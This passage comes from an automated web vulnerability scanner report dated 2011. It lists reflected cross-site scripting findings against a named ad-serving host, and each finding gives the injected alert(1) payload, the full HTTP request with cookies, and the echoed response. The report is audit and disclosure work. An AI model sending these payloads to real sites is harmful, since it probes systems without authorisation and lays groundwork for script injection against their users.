Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 8592
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

       <script type='text/javascript'>
function expandshow_OAS_RMF_Right1() {
document.getElementById("OAS_RMF_Right1_ORG").style.display = "block" ;
document.getElementById("OAS_R
...[SNIP]...
almedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1480219120/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c?_RM_EMPTY_&49959"><script>alert(1)</script>7b53ec5be3f=1" WIDTH=2 HEIGHT=2>

1.51. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54198"><script>alert(1)</script>c4318c53900 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com54198"><script>alert(1)</script>c4318c53900/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1684
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.swf/12868
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com54198"><script>alert(1)</script>c4318c53900/en/homepage.html/L35/644725793/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.52. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 127e5"%3b8ca6b1dcbae was submitted in the REST URL parameter 4. This input was echoed as 127e5";8ca6b1dcbae in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com127e5"%3b8ca6b1dcbae/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1636
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.swf/12868
...[SNIP]...
SMFlash_VERSION = "9";
var TFSMFlash_WMODE = "opaque";

           var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com127e5";8ca6b1dcbae/en/homepage.html/L35/1137606281/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c";
   

var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFlash_OASCLICK +
...[SNIP]...

1.53. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba6d8"><script>alert(1)</script>2a0ab113139 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/enba6d8"><script>alert(1)</script>2a0ab113139/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1686
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.swf/12868
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/enba6d8"><script>alert(1)</script>2a0ab113139/homepage.html/L35/1022227572/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.54. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c569"%3be26f615e545 was submitted in the REST URL parameter 5. This input was echoed as 2c569";e26f615e545 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en2c569"%3be26f615e545/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1634
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.swf/12868
...[SNIP]...
lash_VERSION = "9";
var TFSMFlash_WMODE = "opaque";

           var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en2c569";e26f615e545/homepage.html/L35/297065402/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c";
   

var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFlash_OASCLICK + "";
...[SNIP]...

1.55. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95c19"-alert(1)-"4924956c6ed was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html95c19"-alert(1)-"4924956c6ed/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1656
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.swf/12868
...[SNIP]...
= "9";
var TFSMFlash_WMODE = "opaque";

           var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html95c19"-alert(1)-"4924956c6ed/L35/1566190696/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c";
   

var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFlash_OASCLICK + "";
var TFSMFlas
...[SNIP]...

1.56. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a80c4"><script>alert(1)</script>bfc46e06072 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.htmla80c4"><script>alert(1)</script>bfc46e06072/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1684
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.swf/12868
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.htmla80c4"><script>alert(1)</script>bfc46e06072/L35/428320165/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.57. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1da85"-alert(1)-"06e19d64c5f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L351da85"-alert(1)-"06e19d64c5f/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1660
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.swf/12868
...[SNIP]...
= "9";
var TFSMFlash_WMODE = "opaque";

           var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L351da85"-alert(1)-"06e19d64c5f/L/1215819623/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c";
   

var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFlash_OASCLICK + "";
var TFSMFlash_
...[SNIP]...

1.58. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c182d"><script>alert(1)</script>c87cb48d398 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35c182d"><script>alert(1)</script>c87cb48d398/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1690
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.swf/12868
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35c182d"><script>alert(1)</script>c87cb48d398/L/2108861830/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.59. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42c78"-alert(1)-"f165b0dc14b was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right142c78"-alert(1)-"f165b0dc14b/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1684
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.swf/12868
...[SNIP]...
TFSMFlash_WMODE = "opaque";

           var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/2129054121/Right142c78"-alert(1)-"f165b0dc14b/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c";
   

var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFlash_OASCLICK + "";
var TFSMFlash_SWFFILE =
...[SNIP]...

1.60. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab35b"><img%20src%3da%20onerror%3dalert(1)>24c58f55e72 was submitted in the REST URL parameter 9. This input was echoed as ab35b"><img src=a onerror=alert(1)>24c58f55e72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1ab35b"><img%20src%3da%20onerror%3dalert(1)>24c58f55e72/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1736
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.swf/12868
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/786120233/Right1ab35b"><img src=a onerror=alert(1)>24c58f55e72/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.61. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db86e"><script>alert(1)</script>5183e94c501 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c?db86e"><script>alert(1)</script>5183e94c501=1 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
